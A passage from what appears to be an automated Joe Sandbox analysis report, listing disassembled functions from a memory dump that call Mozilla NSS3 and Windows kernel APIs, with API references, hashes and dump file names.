                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1141D4B5901245ABEB00DF65DC85FAF7A74EF0430AF150128ED2967741EB35EA14CBE2
                                                                                                                                                                                                                                                      Function 6C4D5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5CBE
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C4D5CD7
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C4D5CF0
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C4D5D09
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5D1F
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C4D5D3C
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D51
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D66
                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C4D5D80
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                      • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                      • Opcode ID: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                                                      • Instruction ID: 931d330186d0b3dba99ce8def95e78c791b1b96b2d730fd6b643a91cf32ca69d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631D4F06413416BE701AE249C78F6637A8EF0624AF264034ED55E6B81EFB1F516C2B9
                                                                                                                                                                                                                                                      Function 6C4D6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C5A1DE0,?), ref: 6C4D6CFE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D6D26
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C4D6D70
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000480), ref: 6C4D6D82
                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C4D6DA2
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D6DD8
                                                                                                                                                                                                                                                      • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C4D6E60
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C4D6F19
                                                                                                                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6C4D6F2D
                                                                                                                                                                                                                                                      • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C4D6F7B
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4D7011
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C4D7033
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D703F
                                                                                                                                                                                                                                                      • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C4D7060
                                                                                                                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C4D7087
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C4D70AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2108637330-0
                                                                                                                                                                                                                                                      • Opcode ID: 37ed8fdd6d6512099d1e13aae8ffa969b34efffca1352d8cbc72608b1fa26218
                                                                                                                                                                                                                                                      • Instruction ID: df4efe1af33bba13e248f48aa5c3cab781072d19ecf1a265aa4099342d9d0e65
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37ed8fdd6d6512099d1e13aae8ffa969b34efffca1352d8cbc72608b1fa26218
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DA1E5715082019BEB00EE24DC65FDA32A5DB8130DF268D3DE958CBB91E775F8458793
                                                                                                                                                                                                                                                      Function 6C49AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF25
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF39
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF51
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF69
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49B06B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C49B083
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C49B0A4
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49B0C1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C49B0D9
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C49B102
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B151
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C49B177
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1A2
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1AA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4188828017-0
                                                                                                                                                                                                                                                      • Opcode ID: c12498728b5fab4414551d046e4ad81d3e4f73a94b3337c1111753a9cd6981b4
                                                                                                                                                                                                                                                      • Instruction ID: 2f51752879cddfae776422cd77a4c51d43009570e87bf3bb13d2655a16902400
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c12498728b5fab4414551d046e4ad81d3e4f73a94b3337c1111753a9cd6981b4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78A1CFB5E002159BEF00DF64DC45FAABBB4EF09309F144128E809AB751E731E999CBE1
                                                                                                                                                                                                                                                      Function 6C4A1800 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A1860
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF), ref: 6C4A1897
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4A18AA
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A18C4
                                                                                                                                                                                                                                                      • PK11_ImportDataKey.NSS3(00000000,0000402B,00000004,0000010C,?,00000000), ref: 6C4A193F
                                                                                                                                                                                                                                                      • PK11_DeriveWithTemplate.NSS3 ref: 6C4A1979
                                                                                                                                                                                                                                                      • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C4A1988
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash,0000000B), ref: 6C4A199F
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash), ref: 6C4A19A8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001), ref: 6C4A19B6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-00000018), ref: 6C4A19F2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Item_UtilValuememcpy$CriticalEnterFreeSectionfree$AllocDataDeriveExtractImportTemplateUnlockWithZfreememset
                                                                                                                                                                                                                                                      • String ID: +@$E-v1
                                                                                                                                                                                                                                                      • API String ID: 3144289787-3744174662
                                                                                                                                                                                                                                                      • Opcode ID: 4322c2988e1fc1734822200911c8a7dd6460497dec5f4c60d9bf8c626f877ebc
                                                                                                                                                                                                                                                      • Instruction ID: a36e628f516a4df30d9bf88ead9c21b7f3e733578c029e579f68a6e5856d7899
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4322c2988e1fc1734822200911c8a7dd6460497dec5f4c60d9bf8c626f877ebc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0951A1B6A043019BE700DF69CC40EABB7F8AF98318F04892CE99897751F735D549CB96
                                                                                                                                                                                                                                                      Function 6C492C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(#?Il,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C62
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C76
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C86
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C93
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CC6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CDA
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23), ref: 6C492CEA
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492CF7
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492D4D
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C492D61
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6C492D71
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C492D7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                      • String ID: #?Il
                                                                                                                                                                                                                                                      • API String ID: 2446853827-3645613150
                                                                                                                                                                                                                                                      • Opcode ID: 8b0a2c9f8a7a4b7e524c2255254513bc782c82746092ff7a22a54a76eec893f5
                                                                                                                                                                                                                                                      • Instruction ID: 7d1eb7de6c9cb28985a7849adc07e7a1bab1163eac542aaa9ae28728dafe65d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b0a2c9f8a7a4b7e524c2255254513bc782c82746092ff7a22a54a76eec893f5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E510576D00614ABEB10DF24DC44CAABB78BF1925CB058628EC199BB11EB31FD64C7E1
                                                                                                                                                                                                                                                      Function 6C4EAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EADB1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C4EADF4
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C4EAE08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4EAE25
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C4EAE63
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAE4D
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAE93
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAECC
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C4EAEDE
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C4EAEE6
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAEF5
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C4EAF16
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 2445e26894205e78421e3443ce0e9ca2b7bd66a8300fc5fb4e78eb89ccb131fa
                                                                                                                                                                                                                                                      • Instruction ID: 69d4db248a2457f138938533c6f96028f4a2c54286beabd337b85af67d1ceaa8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2445e26894205e78421e3443ce0e9ca2b7bd66a8300fc5fb4e78eb89ccb131fa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C24128B198421067E720DB2C9C45FAA36B8EF4A31FF120929E81496F41FB35A90986D7
                                                                                                                                                                                                                                                      Function 6C58AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58AF88
                                                                                                                                                                                                                                                      • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C58AFCE
                                                                                                                                                                                                                                                      • PR_SetPollableEvent.NSS3(?), ref: 6C58AFD9
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58AFEF
                                                                                                                                                                                                                                                      • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C58B00F
